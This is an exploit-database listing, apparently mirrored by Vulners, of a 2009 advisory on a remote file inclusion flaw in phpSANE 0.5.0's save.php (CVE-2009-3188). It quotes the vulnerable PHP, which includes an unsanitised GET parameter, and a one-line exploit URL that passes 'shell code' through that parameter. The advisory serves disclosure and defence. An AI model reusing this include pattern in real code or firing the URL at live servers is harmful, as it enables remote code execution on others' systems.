Lucene search
+L

PHPSANE 0.5.0 - 'save.php' Remote File Inclusion

🗓️ 26 Aug 2009 00:00:00Reported by CoBRa_21Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

phpSANE 0.5.0 save.php Remote File Inclusion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3188
26 Aug 200900:00
circl
cve
CVE
CVE-2009-3188
15 Sep 200921:00
cve
cvelist
Cvelist
CVE-2009-3188
15 Sep 200921:00
cvelist
dsquare
Dsquare
phpSANE 0.5.0 RFI
27 Apr 201200:00
dsquare
euvd
EUVD
EUVD-2009-3171
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3188
15 Sep 200921:30
nvd
nessus
Tenable Nessus
phpSANE file_save Parameter Remote File Include
28 Aug 200900:00
nessus
prion
Prion
Remote file inclusion
15 Sep 200921:30
prion
-----------------------------------------------------------------------------------
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------
Author: CoBRa_21
Mail: [email protected]
Script Download:http://sourceforge.net/projects/phpsane/
Dork: Yok :P
-----------------------------------------------------------------------------------
BUG
<?PHP
include("language.php");

$file_save = $_GET['file_save'];
$file_save_image = $_GET['file_save_image'];
$lang_id = $_GET['lang_id'];

if ($file_save_image)
{
  echo "<p class=\"align_center\">\n";
  echo "<img src=\"".$file_save."\" border=\"2\">\n";
  echo "</p>\n";
}
else
{
  // my_pre my_mono
  echo "<p class=\"my_pre\">\n";
  include($file_save);
  echo "</p>\n";
  echo "<hr>\n";
}
-----------------------------------------------------------------------------------
Exploit
http://localhost/path/save.php?file_save= (Shell Code)
-----------------------------------------------------------------------------------
Tüm İslam Aleminin Ramazan-ı Şerifleri Hayırlı ve Mubarek Olsun.
-----------------------------------------------------------------------------------

# milw0rm.com [2009-08-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Aug 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.06053
25